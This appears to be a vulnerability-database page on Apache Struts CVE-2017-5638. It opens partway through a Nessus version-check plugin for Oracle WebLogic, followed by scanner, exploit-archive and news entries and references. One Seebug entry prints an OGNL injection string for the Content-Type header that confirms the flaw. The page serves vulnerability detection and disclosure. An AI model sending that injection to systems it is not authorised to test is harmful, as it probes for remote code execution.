  script_set_attribute(attribute:"cpe", value:"cpe:/a:oracle:fusion_middleware");
  script_set_attribute(attribute:"cpe", value:"cpe:/a:oracle:weblogic_server");
  script_end_attributes();

  script_category(ACT_GATHER_INFO);
  script_family(english:"Misc.");

  script_copyright(english:"This script is Copyright (C) 2017-2019 and is owned by Tenable, Inc. or an Affiliate thereof.");

  script_dependencies("oracle_weblogic_server_installed.nbin");
  script_require_keys("installed_sw/Oracle WebLogic Server");

  exit(0);
}

include("audit.inc");
include("global_settings.inc");
include("misc_func.inc");
include("install_func.inc");

app_name = "Oracle WebLogic Server";

install = get_single_install(app_name:app_name, exit_if_unknown_ver:TRUE);

ohome = install["Oracle Home"];
subdir = install["path"];
version = install["version"];

fix = NULL;
fix_ver = NULL;

# individual security patches
if (version =~ "^10\.3\.6\.")
{
  fix_ver = "10.3.6.0.170418";
  fix = "25388747";
}
else if (version =~ "^12\.1\.3\.")
{
  fix_ver = "12.1.3.0.170418";
  fix = "25388793";
}
else if (version =~ "^12\.2\.1\.0($|[^0-9])")
{
  fix_ver = "12.2.1.0.170418";
  fix = "25388847";
}
else if (version =~ "^12\.2\.1\.1($|[^0-9])")
{
  fix_ver = "12.2.1.1.170418";
  fix = "25388843";
}
else if (version =~ "^12\.2\.1\.2($|[^0-9])")
{
  fix_ver = "12.2.1.2.170418";
  fix = "25388866";
}

if (!isnull(fix_ver) && ver_compare(ver:version, fix:fix_ver, strict:FALSE) == -1)
{
  port = 0;
  report =
    '\n  Oracle home    : ' + ohome +
    '\n  Install path   : ' + subdir +
    '\n  Version        : ' + version +
    '\n  Required patch : ' + fix +
    '\n';
  security_report_v4(extra:report, port:port, severity:SECURITY_HOLE);
}
else audit(AUDIT_INST_PATH_NOT_VULN, app_name, version, subdir);
```
NASL family: Misc.
NASL id: ORACLE_WEBLOGIC_SERVER_CPU_JUL_2017.NASL
description: The version of Oracle WebLogic Server installed on the remote host is affected by multiple vulnerabilities:
- A flaw exists in Jython due to executable classes being created with insecure permissions. A local attacker can exploit this to bypass intended access restrictions and thereby disclose sensitive information or gain elevated privileges. (CVE-2013-2027)
- A remote code execution vulnerability exists in the Apache Struts component in the Jakarta Multipart parser due to improper handling of the Content-Type, Content-Disposition, and Content-Length headers. An unauthenticated, remote attacker can exploit this, via a specially crafted header value in the HTTP request, to execute arbitrary code. (CVE-2017-5638)
- An unspecified flaw exists in the Web Services component that allows an unauthenticated, remote attacker to have an impact on integrity and availability. (CVE-2017-10063)
- An unspecified flaw exists in the Web Container component that allows an authenticated, remote attacker to disclose sensitive information. (CVE-2017-10123)
- An unspecified flaw exists in the JNDI component that allows an unauthenticated, remote attacker to execute arbitrary code. (CVE-2017-10137)
- An unspecified flaw exists in the Core Components that allows an unauthenticated, remote attacker to cause a denial of service condition. (CVE-2017-10147)
- An unspecified flaw exists in the Core Components that allows an unauthenticated, remote attacker to have an impact on integrity. (CVE-2017-10148)
- An unspecified flaw exists in the Web Container component that allows an unauthenticated, remote attacker to have an impact on confidentiality and integrity. (CVE-2017-10178)
last seen: 2020-06-01
modified: 2020-06-02
plugin id: 101815
published: 2017-07-19
reporter: This script is Copyright (C) 2017-2019 and is owned by Tenable, Inc. or an Affiliate thereof.
source: https://www.tenable.com/plugins/nessus/101815
title: Oracle WebLogic Server Multiple Vulnerabilities (July 2017 CPU)

NASL family: CGI abuses
NASL id: MYSQL_ENTERPRISE_MONITOR_3_3_3_1199.NASL
description: According to its self-reported version, the MySQL Enterprise Monitor application running on the remote host is 3.1.x prior to 3.1.7.8023, 3.2.x prior to 3.2.7.1204, or 3.3.x prior to 3.3.3.1199. It is, therefore, affected by multiple vulnerabilities:
- A denial of service vulnerability exists in the Apache Commons component in the FileUpload functionality due to improper handling of file upload requests. An unauthenticated, remote attacker can exploit this, via a specially crafted content-type header, to cause a denial of service condition. Note that this vulnerability does not affect MySQL Enterprise Monitor versions 3.3.x. (CVE-2016-3092)
- An unspecified flaw exists in the Apache Struts component that is triggered during the cleanup of action names. An unauthenticated, remote attacker can exploit this, via a specially crafted payload, to perform unspecified actions. (CVE-2016-4436)
- A carry propagation error exists in the OpenSSL component in the Broadwell-specific Montgomery multiplication procedure when handling input lengths divisible by but longer than 256 bits. This can result in transient authentication and key negotiation failures or reproducible erroneous outcomes of public-key operations with specially crafted input. A man-in-the-middle attacker can possibly exploit this issue to compromise ECDH key negotiations that utilize Brainpool P-512 curves. (CVE-2016-7055)
- An unspecified flaw exists in the Monitoring Server subcomponent that allows an authenticated, remote attacker to impact confidentiality and integrity. (CVE-2017-3306)
- An unspecified flaw exists in the Monitoring Server subcomponent that allows an authenticated, remote attacker to impact integrity and availability. (CVE-2017-3307)
- An out-of-bounds read error exists in the OpenSSL component when handling packets using the CHACHA20/POLY1305 or RC4-MD5 ciphers. An unauthenticated, remote attacker can exploit this, via specially crafted truncated packets, to cause a denial of service condition. (CVE-2017-3731)
- A carry propagating error exists in the OpenSSL component in the x86_64 Montgomery squaring implementation that may cause the BN_mod_exp() function to produce incorrect results. An unauthenticated, remote attacker with sufficient resources can exploit this to obtain sensitive information regarding private keys. (CVE-2017-3732)
- A remote code execution vulnerability exists in the Apache Struts component in the Jakarta Multipart parser due to improper handling of the Content-Type, Content-Disposition, and Content-Length headers. An unauthenticated, remote attacker can exploit this, via a specially crafted header value in the HTTP request, to execute arbitrary code. (CVE-2017-5638)
last seen: 2020-06-01
modified: 2020-06-02
plugin id: 99593
published: 2017-04-21
reporter: This script is Copyright (C) 2017-2019 and is owned by Tenable, Inc. or an Affiliate thereof.
source: https://www.tenable.com/plugins/nessus/99593
title: MySQL Enterprise Monitor 3.1.x < 3.1.7.8023 / 3.2.x < 3.2.7.1204 / 3.3.x < 3.3.3.1199 Multiple Vulnerabilities (April 2017 CPU)
Packetstorm
data source: https://packetstormsecurity.com/files/download/141630/struts2_content_type_ognl.rb.txt
id: PACKETSTORM:141630
last seen: 2017-03-15
published: 2017-03-14
reporter: egypt
source: https://packetstormsecurity.com/files/141630/Apache-Struts-Jakarta-Multipart-Parser-OGNL-Injection.html
title: Apache Struts Jakarta Multipart Parser OGNL Injection

data source: https://packetstormsecurity.com/files/download/141576/struntsrce.py.txt
id: PACKETSTORM:141576
last seen: 2017-03-12
published: 2017-03-10
reporter: anarc0der
source: https://packetstormsecurity.com/files/141576/Apache-Struts-2-2.3.x-2.5.x-Remote-Code-Execution.html
title: Apache Struts 2 2.3.x / 2.5.x Remote Code Execution
Saint
bid | 96729 |
description | Apache Struts 2 Jakarta Multipart Parser file upload command execution |
id | web_dev_struts2jakartarce |
title | apache_struts2_jakarta_file_upload_command_execution |
type | remote |
Seebug
bulletinFamily: exploit
description: It is possible to perform an RCE attack with a malicious Content-Disposition value or with an improper Content-Length header. If the Content-Disposition / Content-Length value is not valid, an exception is thrown which is then used to display an error message to the user. This is a different vector for the same vulnerability described in [S2-045](https://cwiki.apache.org/confluence/display/WW/S2-045) (CVE-2017-5638).
id: SSV:92804
last seen: 2017-11-19
modified: 2017-03-21
published: 2017-03-21
reporter: Root
title: S2-046: Struts 2 Remote Code Execution vulnerability (CVE-2017-5638)

bulletinFamily: exploit
description: Based on the remote code execution vulnerability in the Struts Jakarta plugin, a malicious user can trigger the vulnerability during a file upload by modifying the Content-Type value in the HTTP request header, and then execute system commands. Detection method (as published by a third-party security company): send an HTTP request to the server with the Content-Type field modified to `Content-Type:%{#context['com.opensymphony.xwork2.dispatcher.HttpServletResponse'].addHeader('vul','vul')}.multipart/form-data`. If the response headers contain a `vul: vul` entry, the vulnerability is present.
id: SSV:92746
last seen: 2017-11-19
modified: 2017-03-06
published: 2017-03-06
reporter: Root
title: S2-045: Struts 2 Remote Code Execution vulnerability (CVE-2017-5638)
The Hacker News
id: THN:ACD3479531482E2CA5A8E15EB6B47523
last seen: 2018-01-27
modified: 2017-10-03
published: 2017-10-02
reporter: Swati Khandelwal
source: https://thehackernews.com/2017/10/equifax-credit-security-breach.html
title: Whoops, Turns Out 2.5 Million More Americans Were Affected By Equifax Breach

id: THN:2707247140A4F620671B33D68FEB1EA9
last seen: 2018-01-27
modified: 2017-03-09
published: 2017-03-09
reporter: Swati Khandelwal
source: https://thehackernews.com/2017/03/apache-struts-framework.html
title: New Apache Struts Zero-Day Vulnerability Being Exploited in the Wild

id: THN:6C0E5E35ABB362C8EA341381B3DD76D6
last seen: 2018-01-27
modified: 2017-09-15
published: 2017-09-13
reporter: Swati Khandelwal
source: https://thehackernews.com/2017/09/equifax-apache-struts.html
title: Equifax Suffered Data Breach After It Failed to Patch Old Apache Struts Flaw

id: THN:89C2482FECD181DD37C6DAEEB7A66FA9
last seen: 2018-08-23
modified: 2018-08-23
published: 2018-08-22
reporter: The Hacker News
source: https://thehackernews.com/2018/08/apache-struts-vulnerability.html
title: New Apache Struts RCE Flaw Lets Hackers Take Over Web Servers

id: THN:3F47D7B66C8A65AB31FAC5823C96C34D
last seen: 2018-01-27
modified: 2017-09-12
published: 2017-09-11
reporter: Swati Khandelwal
source: https://thehackernews.com/2017/09/apache-struts-flaws-cisco.html
title: Apache Struts 2 Flaws Affect Multiple Cisco Products

id: THN:AF93AEDBDE6169AD1163D53979A4EA04
last seen: 2018-09-20
modified: 2018-09-20
published: 2018-09-20
reporter: The Hacker News
source: https://thehackernews.com/2018/09/equifax-credit-reporting-breach.html
title: UK Regulator Fines Equifax £500,000 Over 2017 Data Breach
Related news
- One Year Later, Hackers Still Target Apache Struts Flaw
- Companies turn a blind eye to open source risk
- Week in review: Dangerous Bluetooth, EU cybersecurity certification, how Equifax hackers got in
- Equifax Confirms March Struts Vulnerability Behind Breach
- Equifax breach happened because of a missed patch
- Apache servers under attack through easily exploitable Struts 2 flaw (Help Net Security)
- FTC threatens "legal action" over unpatched Log4j and other vulns
References
- https://isc.sans.edu/diary/22169
- https://github.com/rapid7/metasploit-framework/issues/8064
- https://cwiki.apache.org/confluence/display/WW/S2-045
- http://blog.trendmicro.com/trendlabs-security-intelligence/cve-2017-5638-apache-struts-vulnerability-remote-code-execution/
- http://blog.talosintelligence.com/2017/03/apache-0-day-exploited.html
- https://packetstormsecurity.com/files/141494/S2-45-poc.py.txt
- https://nmap.org/nsedoc/scripts/http-vuln-cve2017-5638.html
- https://github.com/mazen160/struts-pwn
- https://exploit-db.com/exploits/41570
- https://twitter.com/theog150/status/841146956135124993
- https://arstechnica.com/security/2017/03/critical-vulnerability-under-massive-attack-imperils-high-impact-sites/
- http://www.securityfocus.com/bid/96729
- http://www.eweek.com/security/apache-struts-vulnerability-under-attack.html
- https://www.imperva.com/blog/2017/03/cve-2017-5638-new-remote-code-execution-rce-vulnerability-in-apache-struts-2/
- https://support.lenovo.com/us/en/product_security/len-14200
- https://h20566.www2.hpe.com/hpsc/doc/public/display?docLocale=en_US&docId=emr_na-hpesbhf03723en_us
- https://h20566.www2.hpe.com/hpsc/doc/public/display?docLocale=en_US&docId=emr_na-hpesbgn03733en_us
- https://h20566.www2.hpe.com/hpsc/doc/public/display?docLocale=en_US&docId=emr_na-hpesbgn03749en_us
- http://www.securitytracker.com/id/1037973
- http://www.oracle.com/technetwork/security-advisory/cpujul2017-3236622.html
- https://www.exploit-db.com/exploits/41614/
- https://www.symantec.com/security-center/network-protection-security-advisories/SA145
- https://struts.apache.org/docs/s2-046.html
- https://struts.apache.org/docs/s2-045.html
- https://cwiki.apache.org/confluence/display/WW/S2-046
- https://www.kb.cert.org/vuls/id/834067
- https://security.netapp.com/advisory/ntap-20170310-0001/
- http://www.arubanetworks.com/assets/alert/ARUBA-PSA-2017-002.txt
- https://git1-us-west.apache.org/repos/asf?p=struts.git%3Ba=commit%3Bh=352306493971e7d5a756d61780d57a76eb1f519a
- https://git1-us-west.apache.org/repos/asf?p=struts.git%3Ba=commit%3Bh=6b8272ce47160036ed120a48345d9aa884477228
- https://lists.apache.org/thread.html/r6d03e45b81eab03580cf7f8bb51cb3e9a1b10a2cc0c6a2d3cc92ed0c%40%3Cannounce.apache.org%3E
- https://lists.apache.org/thread.html/r90890afea72a9571d666820b2fe5942a0a5f86be406fa31da3dd0922%40%3Cannounce.apache.org%3E
- https://lists.apache.org/thread.html/r1125f3044a0946d1e7e6f125a6170b58d413ebd4a95157e4608041c7%40%3Cannounce.apache.org%3E